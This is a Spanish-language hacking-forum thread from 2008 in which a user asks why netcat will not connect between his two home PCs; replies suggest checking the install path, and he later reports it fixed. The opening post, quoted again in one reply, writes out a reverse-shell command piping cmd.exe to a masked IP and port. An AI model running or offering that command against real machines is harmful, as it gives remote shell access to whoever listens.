hacker

Ingresar con nombre de usuario, contraseña y duración de la sesión
| Portal Hacker | Editorial | Descargas | Ezine |
Inicio Ayuda Ingresar Registrarse
06 de Julio de 2008, 12:39:45
Noticias: Te consideras bueno en C++?
Para ver este enlace Registrate o Inicia Sesion
Aquí

+  Foros pOrtal Hacker
|-+  Hacktivismo
| |-+  Hacking (Moderadores: askatasun, - TuX -)
| | |-+  hola amigos hackers necesito ayuda porfavor con netcat
Páginas: [1] Ir Abajo Imprimir
Autor Tema: hola amigos hackers necesito ayuda porfavor con netcat  (Leído 414 veces)
hack_spoofing
Recien llegado
*
Desconectado Desconectado

mi amor platonico jajaja

Ver Perfil
« : 04 de Abril de 2008, 04:06:49 »

hola amigos mi problema es el siguiente tengo 2 pc.s en casa y cuando trato de conectar con las consolas del netcat un la que pongo a que conecte pues todo bien pongo esto nc -vv -w 1000 xxx.xxx.xxx.xx 6000 -e cmd.exe  hasta ahi todo bien pero en la otra pc la que escucha pongo esto nc -vv -l -p 6000    y me aparece esto bueno ahi se ve en la captura.... ahora lo hago al reves  en la otra pc y es lo mismo, ahora hago la coneccion en la misma pc en la que si funciona y todo bien pero en la otra pc pues nomas no cuando lo quiero hacer con las 2 pc.s pues nomas una no me deja y me aparece lo que esta en la captura si alguien sabe porfavor diganme que devo hacer se los agradecere Smiley

SoloAki
NZ2
**

Ver Perfil
« Respuesta #1 : 04 de Abril de 2008, 04:16:56 »

Tendria que ir a Hacking esto mira donde vas a postear amigo  cool
RaKi0N
NZ5

Muestralo con hechos,jamás con palabras

Ver Perfil
« Respuesta #2 : 05 de Abril de 2008, 04:48:31 »

hola amigos mi problema es el siguiente tengo 2 pc.s en casa y cuando trato de conectar con las consolas del netcat un la que pongo a que conecte pues todo bien pongo esto nc -vv -w 1000 xxx.xxx.xxx.xx 6000 -e cmd.exe  hasta ahi todo bien pero en la otra pc la que escucha pongo esto nc -vv -l -p 6000    y me aparece esto bueno ahi se ve en la captura.... ahora lo hago al reves  en la otra pc y es lo mismo, ahora hago la coneccion en la misma pc en la que si funciona y todo bien pero en la otra pc pues nomas no cuando lo quiero hacer con las 2 pc.s pues nomas una no me deja y me aparece lo que esta en la captura si alguien sabe porfavor diganme que devo hacer se los agradecere Smiley

¿Lo has instalado en C:\Netcat?

Cuando te sale esos comandos esque la instalación no está bien o no reconoce

esos comandos.

hack_spoofing
Recien llegado
*

mi amor platonico jajaja

Ver Perfil
« Respuesta #3 : 05 de Abril de 2008, 12:12:44 »

hola amigo rakion gracias por tomarte la molestia y leer mi problema de echo el netcat lo tenia en la raiz del disco duro en el c:\netcat luego lo pase al windows/sistem32 y lo jale desde ahi y me aparece lo mismo el mismo cuadro de dialogo y ya prove de varias formas viendo el manual del netcat  y es lo mismo yo pienso que algo esta mal oviamente y me aparece lo mismo ...que a encontrado una instruccion no permitida lo mismo que esta en la captura ----- esmas ya probe con el comando netstat el tracert el  nslookup bueno varios pensando que alomejor mi cmd esta mal la consola pero no  todos funcionan bien nomas es cuando quiero utilizar netcat espero me puedas ayudar  gracias
hack_spoofing
Recien llegado
*

mi amor platonico jajaja

Ver Perfil
« Respuesta #4 : 15 de Abril de 2008, 11:06:26 »

ya solucione el problema gracias?HuhHuhHuh?
Páginas: [1] Ir Arriba Imprimir 
« anterior próximo »
Ir a:  

Ingresar con nombre de usuario, contraseña y duración de la sesión